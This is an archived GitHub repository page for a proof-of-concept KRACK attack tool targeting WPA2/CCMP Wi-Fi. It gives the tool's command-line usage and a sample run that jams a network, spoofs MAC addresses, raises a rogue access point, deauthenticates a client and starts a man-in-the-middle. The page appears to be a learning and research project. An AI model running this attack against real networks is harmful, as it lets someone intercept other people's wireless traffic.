Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
This repository was archived by the owner on May 4, 2022. It is now read-only.
/krack-pocPublic archive

Krack POC

NotificationsYou must be signed in to change notification settings

Hackndo/krack-poc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 

Repository files navigation

PLEASE READ : I have no intention to update or maintain this code. Feel free to use and modify it, but I won't answer to any comment/issue anymore. This project was difficult, I learnt what I wanted to learn, and developed what I wanted to develop, a quick-one-win to validate my comprehension of the vulnerability.

Proof of concept for Krack attack using channel-based MitM

Theory

French article onhackndo

Environment

WPA2 with CCMP

Usage

# ./Krack.py -husage: Krack.py [-h] [-d] -a ACCESS_POINT -i IFACE_AP -b CLIENT -j                IFACE_CLIENT -c CHANNELoptional arguments:  -h, --help            show this help message and exit  -d, --direct          Skip channel and monitor settings  -a ACCESS_POINT, --access_point ACCESS_POINT                        Enter the SSID of the specific access point to target  -i IFACE_AP, --iface_ap IFACE_AP                        Enter the SSID of the specific access point to target  -b CLIENT, --client CLIENT                        Enter the MAC address of the specific client to target  -j IFACE_CLIENT, --iface_client IFACE_CLIENT                        Enter the SSID of the specific access point to target  -c CHANNEL, --channel CHANNEL                        Choose channel on which the targeted access point is                        listening on# ./Krack.py -a hackndo_ssid_test -i wlan1 -b "ab:cd:0a:0b:11:22" -j wlan0 -c 11[*] Turning off both interfaces[*] Setting interface wlan1 on channel 11[*] Interface wlan1 is on channel 11[*] Setting interface wlan0 on channel 4[*] Interface wlan0 is on channel 4[*] Starting monitor mode for wlan1[*] Interface wlan1 is now in monitor mode[*] Starting monitor mode for wlan0[*] Interface wlan0 is now in monitor mode[*] Turning on both interfaces[*] Trying to find hackndo_ssid_test MAC address[*] MAC Found ! 0e:cc:46:8a:b1:09[*] Jammer initialized correctly[*] Sniffing an AP Beacon...[*] AP Beacon saved![*] Sniffing an AP Probe response...[*] AP Probe response saved![*] Updating wlan1 MAC address to ab:cd:0a:0b:11:22 (Client MAC)[*] wlan1 MAC address update successful[*] Updating wlan0 MAC address to 0e:cc:46:8a:b1:09 (Real AP MAC)[*] wlan0 MAC address update successful[*] Rogue AP started. Sending beacons...[*] Running main loop[*] Starting deauth on AP 0e:cc:46:8a:b1:09 (hackndo_ssid_test) and client ab:cd:0a:0b:11:22...[*] Probe request to our AP[*] Client authenticated to our AP![*] MitM attack has started[*] Deauth stopped

TODO

  • Use CSA (Channel Switch Announcement) to make client switch channel after deauth (See issue#1)
  • Save data sent by client
  • Break cryptography with known plain text when counter is reinitialized

[8]ページ先頭

©2009-2025 Movatter.jp